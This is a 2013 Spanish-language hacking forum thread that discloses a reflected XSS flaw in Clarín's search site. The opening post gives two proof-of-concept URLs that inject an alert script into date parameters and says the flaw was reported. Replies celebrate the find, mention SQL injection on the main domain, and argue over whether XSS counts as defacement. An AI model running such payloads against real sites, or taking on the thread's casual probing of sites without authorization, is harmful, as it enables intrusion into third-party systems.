help_outline
Ayudanos!
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

XSS Reflected clarin.com (El diario mas polemico de la argentina)

  • 8 Respuestas
  • 2875 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado q3rv0

  • *
  • Underc0der
  • Mensajes: 207
  • Actividad:
    0%
  • Reputación 1
  • %ERRORLEVEL%
    • Ver Perfil
    • q3rv0
    • Email
« en: Febrero 01, 2013, 12:07:04 am »



Url del sitio: http://buscador.clarin.com/

Vectores:
- http://buscador.clarin.com/video?from=01/01/2013&to=01/02/2013"><script>alert(/XSS/)</script>
- http://buscador.clarin.com/video?from=01/01/2013"><script>alert(/XSS/)</script>&to=01/02/2013

Autor: [Q]3rV[0]

Reportado: SI
« Última modificación: Enero 10, 2015, 12:52:40 pm por Expermicid »

Desconectado Cronos

  • *
  • Underc0der
  • Mensajes: 1000
  • Actividad:
    0%
  • Reputación 1
  • Mientras mas se, me doy cuenta de lo poco que se.
    • Ver Perfil
    • Email
  • Skype: cronos.labs
« Respuesta #1 en: Febrero 01, 2013, 12:12:52 am »
Hijo de su madre Clarin, el otro dia busque ahí y no encontré xD
Saludos,, Cronos.-

Desconectado Expermicid

  • *
  • Underc0der
  • Mensajes: 457
  • Actividad:
    0%
  • Reputación 0
  • _-Expermicid-_
    • Ver Perfil
  • Skype: expermicid.xd
« Respuesta #2 en: Febrero 01, 2013, 12:13:34 am »
xD muy bueno [Q]3rV[0].

Yo justo hoy mismo vi una propaganda en la TV y estuve por probar en clarin xD

Saludos

Desconectado q3rv0

  • *
  • Underc0der
  • Mensajes: 207
  • Actividad:
    0%
  • Reputación 1
  • %ERRORLEVEL%
    • Ver Perfil
    • q3rv0
    • Email
« Respuesta #3 en: Febrero 01, 2013, 12:16:38 am »
xD muy bueno [Q]3rV[0].

Yo justo hoy mismo vi una propaganda en la TV y estuve por probar en clarin xD

Saludos

jaja a mi me pasa igual, que cuando veo una propaganda y pasan la web, enseguida me pongo a buscar algun fallo en esa web

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #4 en: Febrero 01, 2013, 12:50:17 am »
jajaja muy bueno! te felicito!

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 158
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica
« Respuesta #5 en: Febrero 01, 2013, 01:31:56 am »
También tiene SQL pero en el dominio principal.


Desconectado alexander1712

  • *
  • Underc0der
  • Mensajes: 850
  • Actividad:
    0%
  • Reputación -2
    • Ver Perfil
    • El blog del programador
    • Email
« Respuesta #6 en: Febrero 01, 2013, 12:35:00 pm »
felicidades ahora eres partidario del gobierno, defaceando páginas de clarin jajajaj

saludos!

Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 158
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica
« Respuesta #7 en: Febrero 02, 2013, 02:50:31 pm »
felicidades ahora eres partidario del gobierno, defaceando páginas de clarin jajajaj

saludos!

XSS no es deface #LOL

Desconectado alexander1712

  • *
  • Underc0der
  • Mensajes: 850
  • Actividad:
    0%
  • Reputación -2
    • Ver Perfil
    • El blog del programador
    • Email
« Respuesta #8 en: Febrero 02, 2013, 03:01:40 pm »
felicidades ahora eres partidario del gobierno, defaceando páginas de clarin jajajaj

saludos!

XSS no es deface #LOL

es un decir, porque ilustrame como llamarías a la accion de realizar un xss en la pagina de clarin?

lo unico que se me ocurre es decirle

Citar
felicidades ahora eres partidario del gobierno, explotando vulnerabilidades en páginas de clarin jajajaj

cosa que en ese momento no se me ocurrió.

de todos modos cito la definición de wikipedia

Citar
Defacement es una palabra inglesa que significa desfiguración y es un término usado en informática para hacer referencia a la deformación o cambio producido de manera intencionada en una página web por un atacante que haya obtenido algún tipo de acceso a ella, bien por algún error de programación de la página, por algún bug en el propio servidor o por una mala administración de este. El autor de un defacement se denomina defacer.

esta definición nos ilustra, comentandonos que defacement se le podría llamar a una deformación en el sitio web, originalmente la idea del programador de clarin no era que muestre ese mensaje, entonces es una deformación, por más que sea reflejado, sigue siendo una deformación por tanto según wikipedia un deface.

http://es.wikipedia.org/wiki/Defacement

saludos!
« Última modificación: Febrero 02, 2013, 03:12:58 pm por [H]arkonnen »

 

¿Te gustó el post? COMPARTILO!



XSS Reflected Error Based "Aerolineas Argentinas"

Iniciado por q3rv0

Respuestas: 3
Vistas: 2675
Último mensaje Septiembre 02, 2012, 04:46:33 pm
por ANTRAX
SQLI Direccion de Bienestar Fuerza Aerea Argentina

Iniciado por hdbreaker

Respuestas: 4
Vistas: 2161
Último mensaje Noviembre 26, 2012, 12:05:50 pm
por alexander1712
XSS Tv Publica argentina

Iniciado por trackerkey

Respuestas: 2
Vistas: 1393
Último mensaje Enero 31, 2013, 01:32:39 am
por trackerkey
XSS Napsix Argentina

Iniciado por hdbreaker

Respuestas: 0
Vistas: 1631
Último mensaje Agosto 27, 2012, 06:50:33 pm
por hdbreaker
XSS Reflected Quicksilver Brasil

Iniciado por q3rv0

Respuestas: 0
Vistas: 1718
Último mensaje Septiembre 09, 2012, 02:11:37 am
por q3rv0